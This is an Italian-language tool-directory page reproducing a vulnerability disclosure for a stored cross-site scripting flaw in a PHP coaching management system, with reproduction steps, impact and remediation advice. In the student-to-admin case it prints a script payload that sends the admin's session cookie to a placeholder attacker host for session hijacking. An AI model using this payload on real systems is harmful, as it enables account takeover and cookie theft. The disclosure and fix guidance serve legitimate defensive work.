Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-7222-XSS — Exploit proof-of-concept per XSS persistente (CWE-79) in un sistema di gestione del coaching in PHP, che dimostra il dirottamento della sessione e l'escalation dei privilegi da studente ad amministratore tramite furto di cookie. | Kitploit
Strumenti/GitHubGitHub/xmyronn/cve-2026-7222-xss
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubxmyronn/cve-2026-7222-xss

CVE-2026-7222-XSS

Exploit proof-of-concept per XSS persistente (CWE-79) in un sistema di gestione del coaching in PHP, che dimostra il dirottamento della sessione e l'escalation dei privilegi da studente ad amministratore tramite furto di cookie.

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Cross-Site Scripting persistente (XSS) nel Coaching Management System porta alla compromissione dell'account


Prodotto

Coaching Management System in PHP (Code-Projects.org) https://code-projects.org/coaching-management-system-in-php-with-source-code/


Componenti interessati

  • /modules/student/complaint.php (Invio reclami)
  • /modules/admin/incomingcomplaint.php (Visualizzazione reclami)
  • Funzionalità di risposta ai reclami (Amministratore/Docente → Studente)

Versione

Sconosciuta (Nessuna informazione sulla versione fornita dal venditore; testata sull'ultima versione disponibile da Code-Projects.org ad aprile 2026)


Tipo di vulnerabilità

CWE-79: Neutralizzazione impropria dell'input durante la generazione di pagine web (Cross-Site Scripting persistente)


Descrizione

L'applicazione non riesce a sanitizzare correttamente l'input fornito dall'utente nella funzionalità di reclamo e risposta. JavaScript dannoso iniettato da un utente con privilegi bassi viene memorizzato ed eseguito quando visualizzato da utenti con privilegi più elevati, come amministratori o docenti.

Inoltre, anche la funzionalità di risposta è vulnerabile, consentendo ad amministratori o docenti di iniettare JavaScript che viene eseguito nelle sessioni degli studenti.

Ciò comporta una vulnerabilità di Cross-Site Scripting persistente che interessa più ruoli utente.


Passaggi per la riproduzione

Caso 1: Studente → Amministratore (Escalation dei privilegi)

  1. Accedi come Studente

  2. Vai a: /modules/student/complaint.php Schermata 2026-04-10 212940

  3. Invia un reclamo con il seguente payload:

root@kitploit:~
<script>
new Image().src="http://ATTACKER-IP:PORT/?c="+document.cookie;
</script>
Schermata 2026-04-10 213341
  1. Accedi come Amministratore

  2. Vai a: /modules/admin/incomingcomplaint.php Schermata 2026-04-10 212951

  3. Quando l'amministratore visualizza il reclamo, il payload viene eseguito automaticamente

  4. Il cookie di sessione dell'amministratore viene inviato al server controllato dall'attaccante

  5. Utilizza il cookie di sessione rubato per dirottare la sessione dell'amministratore Schermata 2026-04-10 213350

    Schermata 2026-04-10 213406

Caso 2: Amministratore → Studente (XSS inverso)

  1. Accedi come Amministratore
  2. Rispondi a un reclamo utilizzando il payload:
root@kitploit:~
  1. Accedi come Studente
  2. Visualizza la risposta al reclamo

Prove del Proof of Concept

  • Esecuzione di JavaScript confermata nel pannello di amministrazione alla visualizzazione del reclamo dannoso
  • Cookie di sessione (PHPSESSID) esfiltrato con successo tramite server controllato dall'attaccante
  • Sessione dell'amministratore dirottata utilizzando il cookie rubato
  • Esecuzione di JavaScript confermata nel pannello dello studente tramite la funzionalità di risposta

Impatto

  • Gli utenti con privilegi bassi (studenti) possono eseguire JavaScript arbitrario nel contesto dell'amministratore
  • Porta al dirottamento della sessione a causa dell'assenza del flag HttpOnly
  • Compromissione totale dell'account amministratore
  • L'XSS bidirezionale consente la compromissione di più ruoli (Amministratore, Docente, Studente)
  • Compromissione completa di integrità, riservatezza e disponibilità dell'applicazione

Gravità: CRITICAL


Causa principale

  • Mancanza di sanitizzazione dell'input
  • Assenza di codifica dell'output
  • Mancanza di controlli di sicurezza sui cookie di sessione (flag HttpOnly non impostato)

Raccomandazione

  • Sanitizzare e convalidare tutti gli input utente.
  • Codificare l'output utilizzando funzioni come htmlspecialchars() in PHP
  • Impostare i flag HttpOnly e Secure sui cookie di sessione
  • Implementare una Content Security Policy (CSP)

Scarica lo strumento